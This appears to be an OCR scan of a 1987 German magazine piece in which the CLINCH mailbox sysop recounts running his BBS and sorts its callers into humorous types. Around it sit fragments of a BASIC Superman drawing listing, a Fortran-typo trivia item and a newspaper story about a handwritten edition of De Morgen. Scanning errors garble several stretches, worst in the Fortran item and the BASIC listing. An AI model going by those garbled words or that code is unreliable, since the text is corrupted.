nisch bedingt, da ich nicht einsehen konnte, 
warum ich wertvollen Speicherplatz für Such¬ 
routinen verschwenden sollte, wenn sich jeder 
Benutzer die Position seiner Daten selbst mer¬ 
ken und diese dem System beim Anruf nennen 
konnte. Viel wichtiger war es, so fand ich, dem 
Benutzer mehr zu bieten, als einen stupiden 
Befehl, der ohne Berücksichtigung der Nutze¬ 
rinteressen die vorhandenen Nachrichten in 
einem Stück abspulte. 

Folgerichtig hatte dieses Programm bereits ei¬ 
ne Brett-Struktur, die es gestattete, beliebigen 
Einfluß auf die Ausgabe der Texte zu nehmen 
und das erschien mir als wesentlich sinnvollere 
Nutzung des Speicherplatzes. Im Lauf der Zeit 
wurde das neue System schließlich akzeptiert 
und es gab sogar etliche andere Mailboxen, die 
das Programm übernahmen. Für mich wurde es 
langsam Zeit, mal wieder etwas Neues zu ma¬ 
chen, denn am Horizont zogen bereits die 
Sturmwolken auf, die anzeigten, daß nunmehr 
der C64 an die Grenzen seiner Fähigkeiten 
gestoßen war. Mittlerweile war ein Jahr ver¬ 
gangen, seit dem Tag, an dem CLINCH ans 
Netz ging und die Computerwelt hatte nicht 
aufgehört sich weiterzudrehen. 

IBM - Personalcomputer waren zum Indu¬ 
striestandard geworden und fanden, dank sin- 




kender Preise und qualitativ hochwertiger 
Nachbauten aus Fernost, auch Verbreitung b^ 
Privatleuten. Der erste PC kostete mich noch 
knapp 8000 DM, rund dreimal soviel, wie ich 
bisher in Computer überhaupt investiert hatte. 
Daiür war ich endlich in den Besitz eines Ge¬ 
rätes gelangt, dem von der Post die Absolution 
in Gestalt der Zulassung für Datenfernüber¬ 
tragung erteilt worden war. Wenige Tage nach 
dem Erwerb des Gerätes lagen rneine Anträge 
für Fernsprechmodems und einen Dat^— 
Hauptanschluß an die Post im Briefkasten. Das 
postmoderne Melodram, das der Antragstel¬ 
lung folgte, bis schließlich ein halbes 
ter alle Anträge ausgeführt waren, möchte ich 
an dieser Stelle nicht beschreiben, es wurde 
den Rahmen dieses Beitrags sprengen. 

Einen Computer besitzen, und mit diesem 
Computer umgehen zu können, sind beinn heu¬ 
tigen Stand der Technik zwei verschiedene 
Schuhe. War es mir beim ZX80 urid beim Com- 
modore 64 noch möglich, viel Zeit zu investie¬ 
ren, um auch intimste Detail dieser Maschinen 
zu erforschen, so ging dies beim PC nicht mehr, 
schließlich hatte ich ja nicht diese Riesen¬ 
summe aufgebracht, um ein oder zwei Stunden 
am Tag durch das Labyrinth eines neuen Be¬ 
triebssystems zu wandern. Der Computer sollte 
den C 64 als Mailbox ersetzen und so neue 
Möglichkeiten für das neue Medium erschlie¬ 
ßen. Ich brach also meinen Schwur, nie wieder 
ein nicht von mir selbst geschriebenes Mail- 
boxprogramm zu verwenden und trat zwei 
Schritte zurück. 

Ich besorgte mir die nötige Software, baute 
meinen Abhebemechanismus auf die Not¬ 
wendigkeiten des neuen Rechners um, und 
begann noch einmal von Null, mit nichts als dem 
mittlerweile recht guten Namen CLINCH im 
Rücken. Zwei Probleme waren vordergründig: 
Zum Einen mu ßte ein weiterer PC her, damit die 
nötige Softwareentwicklung unabhängig vom 
Betrieb der Mailbox geschehen konnte. Der 
andere Punkt war die Tatsache, daß die Post¬ 
modems und der Datexhauptanschluß, wenn 
sie denn eines schönen Tages mal kommen 
sollten, Fernmeldegebühren von monatlich 
rund 500 DM.-verursachen würden, die es zu 
finanzieren galt. Da es ein Grundprinzip jeder 
marktwirtschaftlichen Ordnung ist, daß für er¬ 
brachte Leistungen derjenige zahlt, der diese 
Leistung in Anspruch nimmt, wurde ein Konzept 
entwickelt, das - im Gegensatz zu den bisher 
üblichen Verfahren - darauf beruht, daß der 
Mailboxbenutzer einen festen Monatsbeitrag 
zahlt und somit hilft, die Kosten für den Mail¬ 
boxbetrieb zu tragen. Das bedeutete auf der 
anderen Seite, die Mailbox gegenüber denen 


abzuschotten, die nicht bereit waren, wenig¬ 
stens einen kleinen finanziellen Beitrag zu lei¬ 
sten. Mittlerweile nehmen über hundert zah¬ 
lende Benutzer an der CLINCH - Mailbox teil, 
was die Betriebskosten etwa zur Hälfte deckt, 
allerdings ohne daß die mit dem Betrieb ver¬ 
bundene Arbeit entsprechend honoriert wird, ln 
Zusammenarbeit mit den Wüschen und Be¬ 
dürfnissenderzahlenden Benutzerentstand so 
ein Mailboxsystem, das sowohl von der Be¬ 
dienung, als auch von den Inhalten her sei¬ 
nesgleichen sucht. Trotz alledem sind die Mög¬ 
lichkeiten, die die heutige Technik bietet, noch 
nicht voll ausgeschöpft und es ist wieder an der 
Zeit, ein gutes Stück auf dem eingeschlagenen 
Weg weiterzugehen. 

Bisher habe ich eigentlich nur davon berichtet, 
wie es mir persönlich beim Umgang mit dem 
Werkzeug Computer und den Streifzügen 
durchs globale Dorf gegangen ist. Mittlerweile 
habe ich mein eigenes Gasthaus in diesem Dorf 
gebaut und folgerichtig muß nun auch die Rede 
von den Gästen sein, die dieses Haus bewirtet. 

Der Menschenschlag, dem man im globalen 
Dorf begegnet, ist gebrandmarkt, tief ins 
Fleisch ist der Stempel “User“ eingebrannt. Das 
läßt sich ausnahmsweise sehr treffend mit “Be¬ 
nutzer“ ins Deutsche übersetzen. Ein “User'* ist 
halt jemand, der einen Computer benutzt. Da¬ 
bei wird dieses Prädikat völlig vorurteilsfrei ver¬ 
liehen, ohne Ansicht der Person, des Alters 
des Geschlechts oder der politischen Weltan¬ 
schauung. Der einzige Grund, weswegen man 
manchmal schief angesehen werden kann, ist 
der Besitz des falschen Computers. Aber selbst 
dieses Diskriminierungsmerkmal verliert zu¬ 
nehmend an Bedeutung, je länger man im Dorf 
lebt. Die Zeit der Familienfehden, als Atari ge¬ 
gen Commodore kämpfte, ist mit dem Aus¬ 
sterben der Prozessorpatriarchen zuende ge¬ 
gangen und einträchtig hocken die ehemals 
verfeindeten Sippen zusammen und brüten 
über einem gemeinsamen Betriebssystem. 


LIST 1-44 

1 REM COPVRIQHT 1978 

6 PRINT"L" 

7 REM 

8 REM DRAW CLARK KENT 

9 REM 


TOM MUNNECKE 


10 PRINT" 
15 PRINT" 
20 PRINT" 
25 PRINT" 
30 PRINT" 
35 PRINT" 

40 PRINT" 

41 PRINT" 

42 PRINT" 

43 PRINT" 

44 PRINT" 

READV. 


ir'n'itn'-ir 

1-0-0-I 

Ly 

♦ ♦ 

► Vi'iVi ♦ 
♦ SViV, ♦ 
oW,V.: 








Natürlich gibt es User, die schon seit Urzeiten 
dabei sind, und solche, die gerade ihre ersten 
tapsigen Schritte unternehmen. Für den Mail¬ 
boxbetrieber sind beide Gruppen interessant, 
denn nichts ist unterhaltsamer, als einem alten 
Hasen zuzuschauen, wie er mit viel Elan all die 
Befehle eingibt, die er woanders schon im 
Schlaf beherrscht und die hier unweigerlich ins 
Leere führen müssen. Nichts ist schlimmer, als 
immer wieder von der Mailbox darauf hinge¬ 
wiesen zu werden, daß dereingegebene Befehl 
nicht erkannt werden konnte und daß die Ein¬ 
gabe des Wortes “Hilfe“ weiterführen würde. So 
etwas ist grundsätzlich unter der Würde des¬ 
jenigen, der sich für einen geübten Netzflaneur 
hält. Allenfalls ist er bereit, gelegentlich mal ein 
“Help“ einzustreuen, nur um wiederum be- 
schieden zu werden, daß es einen solchen 
Befehl nicht gibt und er doch bitte deutsch 
reden möchte. An dieser Stelle scheidet sich 
gewöhnlich die Spreu vom Weizen, entweder 
der Anrufer legt genervt auf, oder er schafft den 
Sprung überden eigenen Schatten und bedient 
sich der angebotenen Hilfe. Nur im letzteren 
Fall hat er natürlich eine Chance, jemals in den 
Genu ß der Vorzüge des Systems zu kommen. 
Sollte er zur Gruppe der notorischen Aufleger 
gehören, nun, dann ist es kein allzugroßer 
Verlust, denn was kann man schon von jemand 
erwarten, der so schnell aufgibt ? 

Der andere Typus, also derjenige, der gerade 
erst versucht, sich im Dorf zu orientieren, zeigt 
ähnliche Verhaltensmuster, nur vielleicht ein 
Spur ausgeprägter. Wobei er naturgemäß kein 
selbsterworbenes Wissen mitbringt, sondern 
allenfalls ein umfangreiches Repertoir angele¬ 
sener Fehler. Wenn dazu noch ein leicht cho¬ 
lerisches Naturell kommt, ist das Ergebnis pro¬ 
grammiert: Die Informationen der Mailbox er¬ 
schlagen den Neuling und er legt frustriert auf, 
mit dem Schwur auf den Lippen, nie wieder 
anzurufen. Oder er stellt fest, daß sein ange¬ 
lesenes Wissen nicht mit der Wirklichkeit über¬ 
einstimmt, die er nun vorfindet. Das ist wie mit 
den Fahrbahnmarkierungen auf unseren Stra¬ 
ßen, die weißen sind Ergebnis sorgfältigster 
Verkehrsplanung, aberdiegelben sagen, wo es 
wirklich langgeht. Die meisten Autofahrer fol¬ 
gen, bewußt oder unbewußt, den gelben Strei¬ 
fen, aber ein kleiner Teil verschwindet als Ge¬ 
isterfahrer auf der Gegenfahrbahn und kein 
Warnlicht kann ihn davon abhalten. Warnlichter 
und gelbe Leitmarkierungen sollte jedes Com¬ 
puterprogramm haben, man nennt dies dann 
Benutzerführung und dieses Prinzip stö ßt exakt 
da auf seine Grenzen, wo der Benutzer sich 
nicht führen läßt. 

Die Mehrzahl der heutigen Mailboxen überträgt 


die Informationen mit einer Geschwindigkeit 
von 30 Zeichen pro Sekunde, was langsam 
genug ist, um bequem mitlesen zu können. Um 
so seltsamer muß es erscheinen, daß es eine 
Menge Leute gibt, denen es offenbar vöilig 
genügt, irgendetwas auf ihrem Bildschirm dar¬ 
gestellt zu bekommen, ohne auch nur eine 
Sekunde daran zu verschwenden, was denn 
nun in dem Text drinsteht. Beispielsweise gab 
meine Mailbox lange Zeit hindurch den Hinweis 
aus “Gäste bitte Name : GAST benutzen“, um 
darauf hinzuweisen, wie man als Besucher in 
das eigentlich geschlossene System herein 
kommt. Unmittelbar auf diesen Hinweis folgte 
dann die Aufforderung, den Benutzernamen 
einzugeben: “Name : “ Meist folgte dann eine 
Denkpause von bis zu drei Minuten, die der 
Anrufer damit verbrachte, dieses offenbar äu¬ 
ßerst seltsame Verhalten der Mailbox zu deu¬ 
ten. Einige kamen zu dem Schluß, daß dies 
zuviel geistige Anstrengung bedeute und leg¬ 
ten schlicht auf, ohne etwas eingegeben zu 
haben, andere gaben den Namen ein, unter 
dem sie in anderen Mailboxen registriert waren, 
oder ignorierten die deutsche Sprache und ga¬ 
ben sich als “Guest“ zu erkennen. Die von mir 
erwartete Reaktion, daß nämlich entweder der 
in meinem System bereits registrierte Benut¬ 
zername, oder aber das schlichte “Gast“ ein¬ 
gegeben wurde, kam in den seltensten Fällen. 

Beispiel Zwei: Wenn die Mailbox einen Befehl 
nicht versteht, weil er im Programm nicht vor¬ 
gesehen ist, bietet das System die Möglichkeit 
an, durch Eingabe des Befehls “Hilfe“ weitere 
Erklärungen abzurufen. Ich glaube, ich er¬ 
wähnte es weiter vorne schon. Wenn der An¬ 
rufer diesen wohlgemeinten Rat befolgt, er¬ 
scheint folgender Text auf seinem Bildschirm: 
“Gerne. . . Hilfstexte gibt es für folgende Be¬ 
fehle: “, gefolgt von einer Liste der möglichen 
Befehle, dann geht es weiter: “. . .und zu den 
Stichworten: “, gefolgt von einer Liste möglicher 
Stichworte, abschließend kommt noch der Hin¬ 
weis: “Hilfstexte werden abgerufen, indem man 
HILFE, gefolgt vom Befehl oder Stichwort ein¬ 
gibt, zum Beispiel HILFE BOXKONZEPT“. Da¬ 
nach wartet die Box mit der ihr eigenen Ge¬ 
lassenheit auf die Eingabe des Benutzers. 

In meiner Vorstellung ist das eine ziemlich klare 
Hilfestellung, die wenig Deutungsmöglichkei¬ 
ten offen läßt. Ob es nun daran liegt, daß ich als 
langjähriger Computerbesitzer schon zu sehr in 
computernahem Denken gefangen bin, oderob 
es halt doch ein Unterschied ist, ob man etwas 
auf Papier gedruckt liest, oder in der diffusen 
Präsenz einer Datenverbindung, jedenfalls ist 
es für 90 Prozent aller Anrufer zunächst un¬ 
möglich, diese Hinweise zu befolgen. Der hau- 




fiaste Fehler, der hier auftaucht ist es, einen 
Beqriff aus der Stichwortliste einzugeben, 
selbstverständlich ohne das Wörtchen Hilfe 
davor. 

Absoluter Spitzenreiter ist dabei das Stichwort 
“Neueintraq“. Amateurfunker haben die (Ge¬ 
wohnheit, sich gegenseitig 
zustandegekommene Verbindungen |uzu 
senden, die sogenannten QSL-Cards. Ähnli¬ 
ches gilt scheinbar auch im globalen Dort, 
selbst wenn man sicher ist, nievyiedenn diper 
Mailbox anzurufen, so will man sich wenigstens 
in der Benutzerliste verewigen, um allen an¬ 
deren zu dokumentieren, wie weit man schon 
herumgekommen ist. Die zerfallenden Säulen 
der Akropolis sind übersät mit ahnlK^hen Be¬ 
weisen“ der Anwesenheit von Touristen aus 
aller Herren Länder. Ähnlichen Motiven dumen 
auch die eingangs erwähnten Nachrichten Kil- 
roy was here“ in den öffentlichen Brettern der 
diversen Mailboxen entspringen. 

Schauen wir uns doch interessehalber mal ein 
paar der Typen an, die den geplagten Sysop 
manchmal schier zur Verzweiflung treiben und 
am eigenen Verstand zweifeln lassen. Ein Ver¬ 
treter dieser Gattung ist 

der Schüchterne 

Die Tatsache, daß nach vielen erfolglosen 
Wählversuchen nun doch endlich der ersehnte 
Datenton aus dem Hörer schallt, verstört ihn 

völlig und er legt sicherheitshalbersofort wieder 

auf, ohne auch nurden Versuch zu machen, ein 
Datengespräch zu beginnen. Viele Leute, die 
diesem Typus entsprechen, verkaufen ihren 
Akustikkoppler sofort nach diesem unertremi- 
Chen Erlebnis, damit sie nie wieder in so eme 
peinliche Lage geraten können. Diejenigen, 
es fertigbringen, trotzdem weitere Versuche m t 
Mailboxen zu unternehmen, tasten S'oh 
Bit weiter in den Datendschungel ^or, der by- 
sop erkennt sie später daran, daß sie immer 
noch völlig unmotiviert die Verbindung unter¬ 
brechen, weil irgendeine Reaktion der Mailbox 
sie völlig verstört hat. Dabei kann es f'ch 
eine schlichte Fehlermelcjung handeln, oder 
aber auch um die Tatsache daß die Ma Ibox 
genau das macht, was man ihr 
anderen Worten; Jedes f.'.nzelnen Zeichen, das 
die Box sendet, kann für den Schüchternen 
Anlaß sein, kommentarlos aufzulegen. Ein di¬ 
rekter Verwandter des Schüchternen ist 

der Skeptiker 

Er nlaubt einfach nicht, daß Mailbox so einfach 
sein kann, wie sie sich ihm am Bildschirm dar¬ 


bietet. Folgerichtig probiert er das, was die 
Mailbox ihm vorschlägt, gar nicht erst aus, falls 
doch, so besteht er darauf, seine eigenen Vor¬ 
stellungen einzubringen und erweitert die Be¬ 
fehle um eigene Eingebungen, mit dem Erfolg, 
daß entweder gar nichts passiert, oder aber 
etwas ganz Anderes als das, was er wollte. Hat 
er sich so ein ausreichendes Maß an Frust 
erworben, beendet er die Verbindung mit dem 
vorgesehenen Befehl, nur um sich selbst zu 
beweisen, daß er so blöd nun auch wieder nicht 
ist. Eine ansteckende Nebenform des Skepti¬ 
kers ist 

der Überflieger 

Er hat erstens ohnehin keine Zeit, ausgerech¬ 
net in dieser Mailbox anzurufen, zweitens kennt 
er andere Mailboxen schon seit Jahren und 
drittens weiß er ohnehin alles besser als der 
Sysop. Erignoriertalle Sy¬ 
stemmeldungenvöllig und 
zieht seine eigene Show 
ab, egal, ob was dabei 
rauskommt oder nicht. 
Fehlermeldungen verur¬ 
sachen lediglich Achsel¬ 
zucken, gefolgt von noch¬ 
maliger Eingabe der fal¬ 
schen Kommandos, in¬ 
teressanterweise kennt 
der Überflieger genau die 
Befehle, mit denen man 
Schmähbriefe an den Sy¬ 
sop sendet, löscht seine 
Texte aber meistens wie¬ 
der, bevor er das System 
verläßt. Er benutzt dazu grundsätzlich den Be¬ 
fehl Logoff, weil er das mal so gelernt hat, und 
legt dann auf, ohne abzuwarten, ob das tat¬ 
sächlich der richtige Befehl war. Die weitaus 
meisten Vertreter dieser Spezies sind selber 
Sysop oder waren es zumindest einmal. Ähn¬ 
lich verhält sich auch 

der Forscher 

Auch ihn interessieren die funktionierenden Be¬ 
fehle der Box überhaupt nicht, er verwendet 
stattdessen viel lieber seine Fantasie auf die 
Erfindung neuer Befehle und führt minutiöse 
Aufzeichnungen darüber. Er hat ein umfan¬ 
greiches angelesenes Wissen aus Computer¬ 
zeitschriften und wendet dieses erbarmungslos 
auf alle Mailboxen an, die er in die Finger krieot 
Als extrem störend empfindet eres, wenn einer 
seiner Befehle tatsächlich einmal zu einem 
sinnvollen Ergebnis führt, meist reagiert er 
dann wie der Schüchterne und legt einfach auf 
Ganz anders dagegen 





der Computerlegastheniker 


ist 


Er würde nichts lieber sehen, als wenn die 
Mailbox nur ein einziges Mal das tun würde, 
was er will, aber leider nie in der richtigen Form 
eingeben kann. Seine bedeutendste Geistes¬ 
leistung besteht darin, seitenweise Erklärun¬ 
gen zur Boxbedienung zu lesen, ohne deren 
Inhalt auch nur annähernd zu erfassen. Eine 
Zeichenfolge, die einmal sein Auge passiert 
hat, verdampft rückstandslos in den öden Kor¬ 
ridoren seiner Ganglien. Er hat irgendwo mal 
gelesen, daß man in Mailboxen mit dem Befehl 
Help weiterkommt und gibt diesen folgerichtig 
immer wieder ein, wobei es ihm gar nicht zu 
Bewußtsein kommt, daß die Mailbox ihm stän¬ 
dig erklärt, daß er doch das deutsche Wort Hilfe 
benutzen möge. 

Gemeinsam ist diesen Typen, daß eigentlich 
nicht viel dazugehört, um ihr Verhältnis zur 
Mailbox nachhaltig zu verbessern. Ein bischen 
weniger Ignoranz vielleicht , und etwas mehr 
Aufmerksamkeit für das, was zur Bedienung 
einer Mailbox wichtig ist. Immerhin zwingt ihre 
Anwesenheit in den Mailboxen die Betreiber 
dazu, ständig darüber nachzudenken, wie die 
Benutzerführung idiotensicher gemacht wer¬ 
den kann, ohne sie und die Folgen, die ihr 
Dasein hat, wäre die Mailbox einer anderen 
Gruppe hilflos ausgeliefert. Hauptvertreter die¬ 
ser Gruppe ist 

der Schmierer 


er kennt sich in 
der Bedienung 
der verschieden¬ 
sten Mailboxsy¬ 
steme bestens 
aus, zumindest 
weiß er, wie er 
mit seinen ge¬ 
istigen Ergüssen 
ein möglichst 
breites Publikum 
erreicht. Die 
Nachrichten, die 
er hinterläßt, sind 
entweder völlig 
inhaltslos, oder 
dienen ausschließlich der Selbstdarstellung 
und der Beschimpfung anderer Benutzer. Tref¬ 
fen in einer Mailbox zwei oder mehr Schmierer 
aufeinander, so ist die Vorstellung gelaufen und 
Megabyte auf Megabyte verschwindet zu La¬ 
sten sinnloser Nachrichten, bis das ganze Sy¬ 
stem zugemüllt ist. Es gibt Boxen, die dieses 
Stadium schon lange erreicht haben, ohne daß 
es bemerkt wurde. Der andere Hauptvertreter 



der Hacker 


Eigentlich ist erkein wirklicher Hacker, sondern 
lediglich eine Person mit destruktivem Cha¬ 
rakter. Von Hackerethik hat er noch nie gehört 


[LIST 45-79 

! 45 FORI = 1TO600 NEXT REM WAIT A WHILEi 

47 REM CHANGE HIM TO SUPERMAN 

48 REM 


50 PRINT"H“ 
52 PRINT’* 

55 PRINT" 

60 PRINT" 

65 PRINT" 

67 PRINT" 

70 PRINT" 

72 PRINT" 

73 PRINT" 
75 PRINT" 
77 PRINT" 
79 PRINT" 

■READV. 


GOSUBb000 

GOSUB6000 

GOSUB6000 


♦ i 

Viel 


und schöpft sein Wissen aus den halbseidenen 
Publikationen dubioser Verlage. Da sein an¬ 
gelesenes Wissen nicht ausreicht, um in gro¬ 
ßen Systemen tätig zu werden, beschränkt er 
sich darauf, in den lokalen Mailboxen Unsinn zu 
machen. Seine Kenntnisse von Software und 
Hardware beschränken sich auf das, was er 
vom Hörensagen her kennt, dementsprechend 
lächerlich nehmen sich auch seine Versuche 
aus, die Mailbox zum Absturz zu bringen. Er hat 
immer noch nicht begriffen, daß seine Aktionen 
letztendlich gegen sich selbst gerichtet sind, 
denn wenn seine Strategie erfolgreich sein 
könnte, würde er sich selbst jeder Möglichkeit 
berauben, im globalen Dorf mitzumischen. 


Ein halbwegs fehlerfreies Mailboxprogramm 
und nötigenfalls wirksame Zugangsbeschrän¬ 
kungen befreien den gestreßten Sysop recht 
wirkungsvoll von diesen unangenehmen Zeit¬ 
genossen und sorgen für erfrischende Ruhe im 
System, ohne der Spontanität Abbruch zu tun. 
Man sollte nun meinen, daß der Rest der Mail¬ 
boxbenutzer in aller Ruhe mit dem System 
arbeitet, ohne den Sysop in den frühen Wahn¬ 
sinn zu treiben, aber weit gefehlt, auch unter 
den allseits geschätzten seriösen Benutzern 
gibt es welche, deren Ansprüche den Sysop auf 
den Zimmer-Yucca schießen. Da ist zum Bei¬ 
spiel 


der Vollprofi 


Er hat seine Erfahrungen auf kommerziellen 
Mailboxen gesammelt und überträgt sie nun 
weitgehend unreflektiert auf private Systeme. 
Wenn er nicht auf Anhieb eine Verbindung 
zustandekriegt, verzieht er sich in seinen 









Schmollwinkel und hadert mit sich, der Box und 
Gott und der Welt. Er benutzt vorzugsweise die 
Befehle, die er von der kommerziellen Box 
gewöhnt ist und registriert meistens nicht ein¬ 
mal wenn die Mailbox etwas ganz anderes 
macht. Als Ausgleich für den durchlebten Frust 
überschüttet er den Sysop mit Forderungen, 
was alles am Programm wie zu ändern wäre. 
Unglücklicherweise hat der Vollprofi meist aus¬ 
gezeichnete Kenntnisse gängiger Maillwx- 
konzepte und Porgrammiersprachen- so daß 
seine Vorschläge meist peinlich detailliert Aus¬ 
fallen. Bei Sysops, die nur aus moralischer Not 
das Programmieren gelernt haben, kanti dies 
durchaus Auslöser für Suizidversuche sein. Et¬ 
was harmloser ist da schon 

der Semiprofi 

Er ist sich der Tatsache durchaus bewußt, daß 
er es mit einem unzulänglichen System zu tun 
hat und ist auch an und für sich bereit, mit den 
Mängeln zu leben, wenn man nur dieses und 
iGPiBS GVGntuGll, wGnn gs nicht zuviGi MühG 
macht, und wenn es die Zeit erlaubt, in dieser 
und jener Hinsicht ändern könnte. Er wiederholt 
diese Bitte sooft, bis der Sysop entnervt aufgibt 
und zumindGSt Gtwas ÄhnlichGS proQrsmmiGrt, 
weil er genau das schon seit langem machen 
wollte. 

Selbstverständlich gibt es dann noch Leute wie 
Du und ich , die dem Sysop das Leben er- 
iGichtGrn, wo siG nur könnGn, diG inhaltlich ar- 
beiten und selbst Verantwortung übernehmen. 
Die Zeit der ersten zaghaften Schritt durchs 
globale Dorf sind vorüber und die teils reißeri¬ 
sche Berichterstattung der Fachpresse hat ein 
Heer von Datentouristen mit sich gebracht, die 
auf die Ureinwohner losgelassen werden und 
ihre eigene Kultur verbreiten. Die Szene muß 
diese Leute auffangen und das Verhalten aller 
regulieren, oder sie geht unter. 

Als Betreiber einer Mailbox steht man diesen 
Ungereimtheiten im Benutzerverhalten ein¬ 
igermaßen hilflos gegenüber. Wenn man seine 
Mailbox gerade eben eröffnet hat und sehn¬ 
süchtig darauf wartet, daß sich etwas tut, ist 
man bereit, um jeden User zu kämpfen, man 
lauert stundenlang, tagelang, nächtelang vor 
dem Monitor, ist sofort bereit, einen stunden¬ 
langen Dialog von Tastatur zu Tastatur zu füh¬ 
ren und unterstützt die Anrufer, wann imrner 
man auch nur entfernt befürchtet, es könnte der 
letzte Anruf gerade dieses Menschen sein, der 
so viel Gutes in anderen Mailboxen produziert. 
Jede Kritik, die ausgesprochen wird, trifft mitten 
ins Herz, und man setzt Himmel und Hölle in 
Bewegung, um aus dem Programm das her¬ 


auszukitzeln, was die Benutzer wünschen. Mit 
wachsender Erfahrung und steigender Fre¬ 
quentierung der Mailbox wird man meist ruhiger 
und es kommt zu einem Lernprozeß für den 
Betreiber, der zwangsläufig auf eine Ent¬ 
scheidung hinausläuft. Dabei stehen drei Al¬ 
ternativen zur Verfügung, die je nach Tempe¬ 
rament des Betreibers gewählt werden. Einige 
geben ganz auf, motten ihren Computer ein , 
nur um ihn nach mehr oder weniger langer Zeit 
wieder hervorzukramen und sich erneut ins 
Leben des globalen Dorfes zu stürzen, ent¬ 
weder um endlich, endlich konstruktiv an den 
eigenen Utopien und denen der Anderen wei¬ 
terzubauen, oder aber um sich mit Elan in eine 
fremde Mailbox zu stürzen und dort hinge¬ 
bungsvoll all die Befehle zu probieren, die man 
bei anderen belächelt hat. Andere denken sich 
ihr Teil und machen einfach weiter, ungeachtet 
dessen, was in der Welt um sie herum ge¬ 
schieht. Diese Mailboxen erkennt man daran, 
daß sie völlig abgeschottet von der technischen 
und gesellschaftlichen Weiterentwicklung über 
Jahre hinaus vor sich hin existieren, ohne nach 
dem Wenn und Aber zu fragen. Wieder andere 
erarbeiten sich eine dicke Hornhaut und ziehen 
ihre Vorstellungen durch, allein oder in Zu¬ 
sammenarbeit mit anderen entwickeln sie die 
technischen und inhaltlichen Möglichkeiten die¬ 
ses faszinierenden Mediums weiter. Dabei ver¬ 
selbständigen sich zwangsläufig gewisse Din¬ 
ge und niemand sollte erwarten, daß sich ein 
Mailboxbetreiber, dessen System jährlich 
15000 Anrufe verarbeitet, noch so intensiv um 
jeden Einzelnen kümmern kann, wie in den 
ersten Monaten. Je umfangreicher das Projekt 
Mailbox wird, desto schwieriger wird es. Allen 
gerecht zu werden und desto mehr bleibt der 
Idealismus auf der Strecke. 

Es gäbe noch eine Menge mehr zu erzählen, 
Anekdoten und Anekdötchen, von Usern und 
Abusern, von Frust und Lust des Sysops, von 
Hoffnungen und Wünschen, erfüllten und un¬ 
erfüllten Erwartungen, aber es soll jetzt genug 
sein. Ich hoffe, es waren einige Denkanstöße 
dabei und ich habe eine Menge erzählt, von 
dem was wirklich los ist. .. 


Hamburg, 1987 


HD« did * progriiiing punctuition »rror 


irad to 

the 

loss oP a 

Mariner pr 

obe 

to 

Venus? 



, ‘DO 3 1 - 1 



ft. ln a 

Fort 

ran prograa 

,3- 


■iitypcd 

AI 

■IQ 3 1 

- 1.3' «hi 

ch 


accepted 

by 

the coepili 

»r as assign 

ing 

1.3 

tD the V 

Afi A 

bli 1031. 




(You «il 

1 ha 

V» to read 

the ftnn aI» 

of t K. 

Historv 

of 

Coeoutina . 

IPaf to linrt 

6ut 


this cau 

i»ed 

loss 

the probe,) 


Source 1 

INPUT/OUTPUT. 








Als der Blackout 
kam, half nur 
noch der Griffel 


Es soll ja Vorkommen, daß Leser 
ihre Zeitung manchmal nicht 
ganz plausibel finden. Daß sie 
aber Probleme haben, sie zu 
entziffern, dürfte wohl einmalig 
sein. So geschah es diese Woche 
in Belgien. 

Von HELMUT HETZEL 

P lötzlich knallt es. Der Strom 
fallt aus. Die Fernschreiber ste¬ 
hen still. Die Bildschirme der 
Computer verdunkeln sich. Dem Re¬ 
dakteur wird es ganz mulmig. Auto¬ 
matisch schießt es ihm durch den 
Kopf: „Hoffentlich ist mein Text ge¬ 
speichert.“ 

„Systemausfall im Zentralcompu¬ 
ter“ heißt das unter Fachleuten. In 
der Regel sind solche Störungen im 
Textverarbeitungs-System bei Zei¬ 
tungen schnell behoben. Daß das Er¬ 
scheinen der Zeitung dadurch wirk¬ 
lich gefährdet wird, ist eher unwahr¬ 
scheinlich. 

„Genau das dachten wir auch“, 
sagt Doreen Espeei, Redakteurin der 
flämischen Tageszeitung „De Mor¬ 
gen“, die mit ihren Kollegen einen 
solchen Systemausfall im Zentral¬ 
computer auf wohl noch nie dagewe¬ 
sene Weise löste. „Der Strom blieb 
diesmal stundenlang weg. Die Zeit 
verstrich immer schneller. Die Tech¬ 
niker konnten den Fehler im Compu¬ 
tersystem einfach nicht finden. Unse¬ 
re Redaktions-Schlußzeiten rückten 
immer näher. Und als es 17.00 Uhr 
geschlagen hatte, da war uns klar: 
Jetzt muß irgend etwas geschehen.“ 
Nur, was? Das war jetzt die große 
Frage. Es stellte sich nämlich schnell 
heraus, daß für 34 Redakteure nur 


Da man nicht genügend Schreib¬ 
maschinen hatte, eine Notausgabe 
zeitlich kaum mehr zu schaffen war, 
schoß den Redakteuren ein ganz un¬ 
gewöhnlicher Gedanke durch den 
Kopf; Warum sollte man die Zeitung 
nicht einmal mit der Hand schreiben? 

Gedacht, getan. Damen und Her¬ 
ren, deren Handschrift die einstigen 
Schönschräib-Übungen aus der 
Grundschule noch ansatzweise er¬ 
kennen hefl, mußten nun an die 
Front. Dann ging es los. „Dem Kolle¬ 
gen Computer woUte man mal ein 
Schnippchen schlagen, es ihm einmal 
so richtig zeigen.“ So lautete die Paro¬ 
le der Redaktion. „Unser Ehrgeiz war 
es, eine ganz normale Zeitung zu ma¬ 
chen - nur eben handgeschrieben“, 
erläutert Doreen Espeei. Und schlie߬ 
lich wollte man sich wegen dieser 
kleinen technischen Störung am 
nächsten Tag bei Nichterscheinung 
des „Morgen“ nicht auch noch den 
fteigewordenen Titel einer flämi¬ 
schen Satire-Zeitschrift anhängen 
lassen. Das Satire-Blatt, das jüngst 
Pleite machte, hieß „Der Schweiger“. 

Die Leser reagierten 
überwiegend positiv 

Kugelschreiber und Filzstifte glüh¬ 
ten. Und am nächsten Morgen lag 
eine einzigartige Zeitungsnummer an 
den Kiosken in Flandern. Auftnacher, 
fein säuberlich in Versalien und von 
Hand gestylt: „Wer schreibt, der 
bleibt.“ Unterzeüe; „Graphologie: 
Die große Handschrift - pure Absicht 
oder greifen Sie doch lieber zur Bril¬ 


le?“ Im Blatt dann ein Artikel zu sel¬ 
bigem Thema. Recherchiert war er 
von den Kolleginnen und Kollegen, 
deren Hände nur Hieroglyphen aufs 
Papier bringen kormten. Sie mußten 
ja auch irgendwie beschäftigt werden 
und durften mit diesem selbstkriti¬ 
schen Beitrag das SchriftbUd der tat¬ 
sächlich zur Feder greifenden Schön¬ 
schreiber bis ins I-Tüpfelchen analy¬ 
sieren. 

Ergebnis des graphologischen Gut¬ 
achtens: „Die Handschrift der Kolle¬ 
ginnen und Kollegen läßt deutlich 
darauf schließen, daß es sich bei die¬ 
sen Personen um Idealisten mit ei¬ 
nem ausgesprochenen Interesse für 
